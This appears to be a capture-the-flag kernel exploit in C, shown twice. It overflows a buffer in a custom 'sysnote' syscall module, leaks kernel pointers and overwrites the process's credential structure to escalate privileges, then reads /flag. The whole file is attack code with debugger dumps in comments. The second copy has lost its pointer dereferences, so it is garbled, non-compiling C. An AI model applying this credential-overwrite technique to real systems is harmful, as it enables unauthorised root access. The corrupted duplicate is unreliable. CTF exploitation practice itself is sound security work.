lordidiot/sysnote.c

## sysnote.c
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/syscall.h>

#define ADD 548
#define DEL 549
#define SHOW 550
#define COPY 551
#define CURR 552

void _pause(){
    char a;
    printf("[+] Press anything to continue\n");
    read(0, &a, 1);
}

int main(){
    void * current = (void*)syscall(CURR);
    printf("[+] current: %p\n", current);

    // Copy to note
    char * s = malloc(0x1000);
    printf("[+] s:       %p\n", s);
    memset(s, 'A', 0x408);
    s[0x408] = '\x00';
    syscall(ADD, s);

    // Leak pointers
    syscall(SHOW, s);

    // Overwrite * cred
    // 81:0408│  0x186bf88 —▸ 0xffff9e2782454840 ◂— add    al, byte ptr [rax] /* 0x3e800000002 */
    // 82:0410│  0x186bf90 —▸ 0xffff9e2782454840 ◂— add    al, byte ptr [rax] /* 0x3e800000002 */
    *(void **)&s[0x410] = current+0x6a8;
    *(void **)&s[0x78] = current+0x6a8;
    *(void **)&s[0x80] = current+0x6a8;
    *(void **)&s[0x88] = current+0x6a8;
    *(void **)&s[0x90] = current+0x6a8;
    *(void **)&s[0x110] = current+0x6a8;
    syscall(ADD, s);

    // Setup cred
    // 08:0040│  0xffff8cfc82456880 ◂— 0x1ffffffffff
    // 09:0048│  0xffff8cfc82456888 ◂— 0
    // ... ↓     5 skipped
    // 0f:0078│  0xffff8cfc824568b8 —▸ 0xffff8cfc82404160 ◂— add    dword ptr [rax], eax /* 0x100000001 */
    // 10:0080│  0xffff8cfc824568c0 —▸ 0xffff8cfc823f1e80 ◂— add    eax, 0x2000000 /* 0x200000005 */
    // 11:0088│  0xffff8cfc824568c8 —▸ 0xffffffff99a4d5a0 ◂— 1
    // 12:0090│  0xffff8cfc824568d0 —▸ 0xffff8cfc813e2cc0 ◂— add    eax, 0x1000000 /* 0x100000005 */
    // 22:0110│  0xffff8b1082455950 —▸ 0xffff8b10824559c0 ◂— 0
    memset(s, '\x00', 0x400);
    *(void **)&s[0x40] = 0x1ffffffffff;
    *(void **)&s[0x78] = current+0x6a8;
    *(void **)&s[0x80] = current+0x6a8;
    *(void **)&s[0x88] = current+0x6a8;
    *(void **)&s[0x90] = current+0x6a8;
    *(void **)&s[0x110] = current+0x6a8;
    syscall(COPY, s);

    char flag[100];
    int fd = open("/flag", O_RDONLY);
    read(fd, flag, 100);
    puts(flag);
    close(fd);

    // Pause to debug
    _pause();

    return 0;
}
	#include <stdio.h>
	#include <fcntl.h>
	#include <stdlib.h>
	#include <string.h>
	#include <unistd.h>
	#include <sys/stat.h>
	#include <sys/types.h>
	#include <sys/syscall.h>

	#define ADD 548
	#define DEL 549
	#define SHOW 550
	#define COPY 551
	#define CURR 552

	void _pause(){
	char a;
	printf("[+] Press anything to continue\n");
	read(0, &a, 1);
	}

	int main(){
	void * current = (void*)syscall(CURR);
	printf("[+] current: %p\n", current);

	// Copy to note
	char * s = malloc(0x1000);
	printf("[+] s: %p\n", s);
	memset(s, 'A', 0x408);
	s[0x408] = '\x00';
	syscall(ADD, s);

	// Leak pointers
	syscall(SHOW, s);

	// Overwrite * cred
	// 81:0408│ 0x186bf88 —▸ 0xffff9e2782454840 ◂— add al, byte ptr [rax] /* 0x3e800000002 */
	// 82:0410│ 0x186bf90 —▸ 0xffff9e2782454840 ◂— add al, byte ptr [rax] /* 0x3e800000002 */
	(void *)&s[0x410] = current+0x6a8;
	(void *)&s[0x78] = current+0x6a8;
	(void *)&s[0x80] = current+0x6a8;
	(void *)&s[0x88] = current+0x6a8;
	(void *)&s[0x90] = current+0x6a8;
	(void *)&s[0x110] = current+0x6a8;
	syscall(ADD, s);

	// Setup cred
	// 08:0040│ 0xffff8cfc82456880 ◂— 0x1ffffffffff
	// 09:0048│ 0xffff8cfc82456888 ◂— 0
	// ... ↓ 5 skipped
	// 0f:0078│ 0xffff8cfc824568b8 —▸ 0xffff8cfc82404160 ◂— add dword ptr [rax], eax /* 0x100000001 */
	// 10:0080│ 0xffff8cfc824568c0 —▸ 0xffff8cfc823f1e80 ◂— add eax, 0x2000000 /* 0x200000005 */
	// 11:0088│ 0xffff8cfc824568c8 —▸ 0xffffffff99a4d5a0 ◂— 1
	// 12:0090│ 0xffff8cfc824568d0 —▸ 0xffff8cfc813e2cc0 ◂— add eax, 0x1000000 /* 0x100000005 */
	// 22:0110│ 0xffff8b1082455950 —▸ 0xffff8b10824559c0 ◂— 0
	memset(s, '\x00', 0x400);
	(void *)&s[0x40] = 0x1ffffffffff;
	(void *)&s[0x78] = current+0x6a8;
	(void *)&s[0x80] = current+0x6a8;
	(void *)&s[0x88] = current+0x6a8;
	(void *)&s[0x90] = current+0x6a8;
	(void *)&s[0x110] = current+0x6a8;
	syscall(COPY, s);

	char flag[100];
	int fd = open("/flag", O_RDONLY);
	read(fd, flag, 100);
	puts(flag);
	close(fd);

	// Pause to debug
	_pause();

	return 0;
	}